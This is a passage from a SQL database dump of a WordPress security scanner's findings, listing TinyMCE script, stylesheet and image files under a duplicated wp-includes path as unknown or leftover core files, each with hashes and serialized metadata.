More</a>','a:5:{s:4:\"file\";s:66:\"wp-includes/wp-includes/js/tinymce/plugins/wptextpattern/plugin.js\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(34433,1631564706,1631564706,'new','knownfile',75,'d745e619453228d7682a41d0bbd39e61','bb0fc45c9e03c0fb175c62d352b5a107','Unknown file in WordPress core: wp-includes/wp-includes/js/tinymce/plugins/wptextpattern/plugin.min.js','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:70:\"wp-includes/wp-includes/js/tinymce/plugins/wptextpattern/plugin.min.js\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(34434,1631564706,1631564706,'new','knownfile',75,'0ce510e6244f7c3b41459f3ea5c085fa','cb4f6665b542571c12b89ea5c072ccf6','Unknown file in WordPress core: wp-includes/wp-includes/js/tinymce/plugins/wpview/plugin.js','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:59:\"wp-includes/wp-includes/js/tinymce/plugins/wpview/plugin.js\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(34435,1631564706,1631564706,'new','knownfile',75,'78de2a97a8ca774e8b6a56e03bb93fd5','2975a6fbe678a26128d0dab4d1688e41','Unknown file in WordPress core: wp-includes/wp-includes/js/tinymce/plugins/wpview/plugin.min.js','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:63:\"wp-includes/wp-includes/js/tinymce/plugins/wpview/plugin.min.js\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(34436,1631564706,1631564706,'new','knownfile',75,'a09b5a3b5a03c8b821e7712ffd86893a','31625bee1e283167b3f74c2059827b69','Unknown file in WordPress core: wp-includes/wp-includes/js/tinymce/skins/lightgray/content.inline.min.css','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:73:\"wp-includes/wp-includes/js/tinymce/skins/lightgray/content.inline.min.css\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(34437,1631564706,1631564706,'new','knownfile',75,'ecc1927debca31bd81e0917921f64253','52239750a770fb82c5cb00c931066eda','Unknown file in WordPress core: wp-includes/wp-includes/js/tinymce/skins/lightgray/content.min.css','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:66:\"wp-includes/wp-includes/js/tinymce/skins/lightgray/content.min.css\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(34438,1631564706,1631564706,'new','knownfile',75,'658215181b1698eb227d925cf531fa3c','4ab40af5cce893d46629d9314d0db2a6','Unknown file in WordPress core: wp-includes/wp-includes/js/tinymce/skins/lightgray/img/anchor.gif','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:65:\"wp-includes/wp-includes/js/tinymce/skins/lightgray/img/anchor.gif\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(34439,1631564706,1631564706,'new','knownfile',75,'871f5875b18c2fdd66e893dcd92f732e','f965573b785df25b62697c6a927822bf','Unknown file in WordPress core: wp-includes/wp-includes/js/tinymce/skins/lightgray/img/loader.gif','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:65:\"wp-includes/wp-includes/js/tinymce/skins/lightgray/img/loader.gif\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(34440,1631564706,1631564706,'new','knownfile',75,'56b54d198298a01e62845cd17117c263','554131c712898082dab52d9ab60990a4','Unknown file in WordPress core: wp-includes/wp-includes/js/tinymce/skins/lightgray/img/object.gif','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:65:\"wp-includes/wp-includes/js/tinymce/skins/lightgray/img/object.gif\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(34441,1631564706,1631564706,'new','knownfile',25,'0789c1a33040d5d68e707b1c93a0c640','40d43bd1c1bb851b29b89efd303e12a6','Old WordPress core file not removed during update: wp-includes/wp-includes/js/tinymce/skins/lightgray/img/trans.gif','This file is in a WordPress core location but is from an older version of WordPress and not used with your current version. Hosting or permissions issues can cause these files to get left behind when WordPress is updated and they should be removed if possible.','a:5:{s:4:\"file\";s:64:\"wp-includes/wp-includes/js/tinymce/skins/lightgray/img/trans.gif\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(34442,1631564706,1631564706,'new','knownfile',75,'cf5308feae8f679131b0ae1e04176372','f598e42ee17745239bde9817d15b36a2','Unknown file in WordPress core: wp-includes/wp-includes/js/tinymce/skins/lightgray/skin.min.css','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:63:\"wp-includes/wp-includes/js/tinymce/skins/lightgray/skin.min.css\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(34443,1631564706,1631564706,'new','knownfile',75,'129fc9eae1e1dbd54c15ead362ea640e','3d7f63025b9f8f2440b3f74561989f2c','Unknown file in WordPress core: wp-includes/wp-includes/js/tinymce/skins/wordpress/images/audio.png','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:67:\"wp-includes/wp-includes/js/tinymce/skins/wordpress/images/audio.png\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(34444,1631564706,1631564706,'new','knownfile',75,'4281b6a1c14fac05cf7ffd780d4ccd22','9fdf77f05c5a4e319607225f474c7a5a','Unknown file in WordPress core: wp-includes/wp-includes/js/tinymce/skins/wordpress/images/dashicon-edit.png','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:75:\"wp-includes/wp-includes/js/tinymce/skins/wordpress/images/dashicon-edit.png\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(34445,1631564706,1631564706,'new','knownfile',75,'a09d92dfd9ce1b26b427a82127b85229','ab551f21ba130c3df9a4429069777a77','Unknown file in WordPress core: wp-includes/wp-includes/js/tinymce/skins/wordpress/images/dashicon-no.png','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:73:\"wp-includes/wp-includes/js/tinymce/skins/wordpress/images/dashicon-no.png\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(34446,1631564706,1631564706,'new','knownfile',75,'86ece52012af20c180c96cb5dba800b3','a99701ff751bfd9255aa6d71ec92a5d6','Unknown file in WordPress core: wp-includes/wp-includes/js/tinymce/skins/wordpress/images/embedded.png','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:70:\"wp-includes/wp-includes/js/tinymce/skins/wordpress/images/embedded.png\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(34447,1631564707,1631564707,'new','knownfile',75,'2bd3c4730202336a92de1a48d9963119','100b9afb885110165939cfcbe4a9939b','Unknown file in WordPress core: wp-includes/wp-includes/js/tinymce/skins/wordpress/images/gallery-2x.png','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:72:\"wp-includes/wp-includes/js/tinymce/skins/wordpress/images/gallery-2x.png\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(34448,1631564707,1631564707,'new','knownfile',75,'e5d3b702214be9e437b0af2dffe859a4','f145a05834779ba825b5a191bc1140e8','Unknown file in WordPress core: wp-includes/wp-includes/js/tinymce/skins/wordpress/images/gallery.png','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:69:\"wp-includes/wp-includes/js/tinymce/skins/wordpress/images/gallery.png\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(34449,1631564707,1631564707,'new','knownfile',75,'19a1a612c34254dab3459aca6a69335b','ca7408fb0737a86533cf1b5c9978af74','Unknown file in WordPress core: wp-includes/wp-includes/js/tinymce/skins/wordpress/images/more-2x.png','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:69:\"wp-includes/wp-includes/js/tinymce/skins/wordpress/images/more-2x.png\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(34450,1631564707,1631564707,'new','knownfile',75,'5aa36a57708fe60b29042a9b0e1e6077','b4a9cd6e7a31f3b959a89c7be230d0b7','Unknown file in WordPress core: wp-includes/wp-includes/js/tinymce/skins/wordpress/images/more.png','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:66:\"wp-includes/wp-includes/js/tinymce/skins/wordpress/images/more.png\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(34451,1631564707,1631564707,'new','knownfile',75,'a50dd5555268f032b65e29e1911cfc16','54a5db7879f6ab9317949c69c1963be3','Unknown file in WordPress core: wp-includes/wp-includes/js/tinymce/skins/wordpress/images/pagebreak-2x.png','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:74:\"wp-includes/wp-includes/js/tinymce/skins/wordpress/images/pagebreak-2x.png\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(34452,1631564707,1631564707,'new','knownfile',75,'14a94b63c90a019ac1a28c9b1d89b8a8','b0d4707fee34b780201efee2cd54b331','Unknown file in WordPress core: wp-includes/wp-includes/js/tinymce/skins/wordpress/images/pagebreak.png','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:71:\"wp-includes/wp-includes/js/tinymce/skins/wordpress/images/pagebreak.png\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(34453,1631564707,1631564707,'new','knownfile',75,'2e693c01fc606a57b574cfef4c5e336c','e926d248fbe094c3448603a39de69c63','Unknown file in WordPress core: wp-includes/wp-includes/js/tinymce/skins/wordpress/images/playlist-audio.png','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:76:\"wp-includes/wp-includes/js/tinymce/skins/wordpress/images/playlist-audio.png\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(34454,1631564707,1631564707,'new','knownfile',75,'bd911d04b378b11165107d66cedd358a','9b1ae4bd68e469a1bec1788d080a1144','Unknown file in WordPress core: wp-includes/wp-includes/js/tinymce/skins/wordpress/images/playlist-video.png','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:76:\"wp-includes/wp-includes/js/tinymce/skins/wordpress/images/playlist-video.png\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(34455,1631564707,1631564707,'new','knownfile',75,'602a2e777c86614ad7d1804e5311735b','70aa99035bca058b8b56fb6f4986a047','Unknown file in WordPress core: wp-includes/wp-includes/js/tinymce/skins/wordpress/images/video.png','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:67:\"wp-includes/wp-includes/js/tinymce/skins/wordpress/images/video.png\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(34456,1631564707,1631564707,'new','knownfile',75,'fddd2ff254e445a39272774f6284910e','4d415996f4de1c4976d2ffe5525dd63c','Unknown file in WordPress core: wp-includes/wp-includes/js/tinymce/skins/wordpress/wp-content.css','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:65:\"wp-includes/wp-includes/js/tinymce/skins/wordpress/wp-content.css\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(34457,1631564707,1631564707,'new','knownfile',75,'5e76c631d9ca2e9f70da71f926be533c','0ff33da5b042c49b7042dbd28f320ddb','Unknown file in WordPress core: wp-includes/wp-includes/js/tinymce/themes/inlite/theme.js','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:57:\"wp-includes/wp-includes/js/tinymce/themes/inlite/theme.js\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(34458,1631564707,1631564707,'new','knownfile',75,'96dd77aa91d3ec8eef53bcff9f531d6c','874530172640dd8d8bf9d96795ecfc8e','Unknown file in WordPress core: wp-includes/wp-includes/js/tinymce/themes/inlite/theme.min.js','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:61:\"wp-includes/wp-includes/js/tinymce/themes/inlite/theme.min.js\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(34459,1631564707,1631564707,'new','knownfile',75,'7b375ad95c4e9a2dea0d6c6e19217054','29ce188522227daaad72b18386d26a82','Unknown file in WordPress core: wp-includes/wp-includes/js/tinymce/themes/modern/theme.js','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:57:\"wp-includes/wp-includes/js/tinymce/themes/modern/theme.js\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(34460,1631564707,1631564707,'new','knownfile',75,'093b567c10c24ff8d12b652502f2537b','adfe735b079187c1db4a9ab204047b09','Unknown file in WordPress core: wp-includes/wp-includes/js/tinymce/themes/modern/theme.min.js','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:61:\"wp-includes/wp-includes/js/tinymce/themes/modern/theme.min.js\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(34461,1631564707,1631564707,'new','knownfile',75,'9bd457fe6088fbd9a6605e1ae5a5e677','59ff6bedcaf3e28f5f233446a9b91f09','Unknown file in WordPress core: wp-includes/wp-includes/js/tinymce/tiny_mce_popup.js','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:52:\"wp-includes/wp-includes/js/tinymce/tiny_mce_popup.js\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(34462,1631564707,1631564707,'new','knownfile',75,'d26a463dddb4bbe86096b63af42f9b54','3ad350473c931f1735b21f2d4b670a8a','Unknown file in WordPress core: wp-includes/wp-includes/js/tinymce/tinymce.min.js','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:49:\"wp-includes/wp-includes/js/tinymce/tinymce.min.js\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(34463,1631564707,1631564707,'new','knownfile',75,'f09e5cb700cfdca6c09241325e27388e','ebdb5a8612e3aaad5f7ff00e77f3bd8c','Unknown file in WordPress core: wp-includes/wp-includes/js/tinymce/utils/editable_selects.js','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:60:\"wp-includes/wp-includes/js/tinymce/utils/editable_selects.js\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(34464,1631564707,1631564707,'new','knownfile',75,'b4c070464cf53c5018a761a3a61a24af','e06d6068051859f8bb86b900d4883958','Unknown file in WordPress core: wp-includes/wp-includes/js/tinymce/utils/form_utils.js','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:54:\"wp-includes/wp-includes/js/tinymce/utils/form_utils.js\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(34465,1631564707,1631564707,'new','knownfile',75,'4d6ce3aef5c23a1c51bf9040f8a2713d','8b5f4faf57ee16a3b25ef54912f5ad7e','Unknown file in WordPress core: wp-includes/wp-includes/js/tinymce/utils/mctabs.js','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:50:\"wp-includes/wp-includes/js/tinymce/utils/mctabs.js\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(34466,1631564707,1631564707,'new','knownfile',75,'e8555de7788ffc9f14462512b6be37d2','88866b23777b473dab1ec5de562c4703','Unknown file in WordPress core: wp-includes/wp-includes/js/tinymce/utils/validate.js','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:52:\"wp-includes/wp-includes/js/tinymce/utils/validate.js\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(34467,1631564707,1631564707,'new','knownfile',75,'8f80496551912ddd155f84bb2cdce8a1','bfe53fe574ea27f24f9df5b095c89415','Unknown file in WordPress core: wp-includes/wp-includes/js/tinymce/wp-tinymce.js','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:48:\"wp-includes/wp-includes/js/tinymce/wp-tinymce.js\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(34468,1631564707,1631564707,'new','knownfile',75,'9a34613e1aec91b9f5de079fa2d4349e','6d37586ec34b928f634add5c5870b3aa','Unknown file in WordPress core: wp-includes/wp-includes/js/tinymce/wp-tinymce.php','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:49:\"wp-includes/wp-includes/js/tinymce/wp-tinymce.php\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(34469,1631564707,1631564707,'new','knownfile',25,'c11dfc9958445858443c19f8243cf193','e3a13e1b7256d6aa1b3888dc279cbcf8','Old WordPress core file not removed during update: wp-includes/wp-includes/js/tw-sack.js','This file is in a WordPress core location but is from an older version of WordPress and not used with your current version. Hosting or permissions issues can cause these files to get left behind when WordPress is updated and they should be removed if possible.','a:5:{s:4:\"file\";s:37:\"wp-includes/wp-includes/js/tw-sack.js\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(34470,1631564708,1631564708,'new','knownfile',75,'24b222302fde5f0423b7b4db6e5ea982','0cbea8616235a0117dda3db77ff899d5','Unknown file in WordPress core: wp-includes/wp-includes/js/tw-sack.min.js','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:41:\"wp-includes/wp-includes/js/tw-sack.min.js\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(34471,1631564708,1631564708,'new','knownfile',75,'a142f1f23d915351dba914104310f106','b770df839931f3b67d7f0b3971ab9ae2','Unknown file in WordPress core: wp-includes/wp-includes/js/twemoji.js','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn 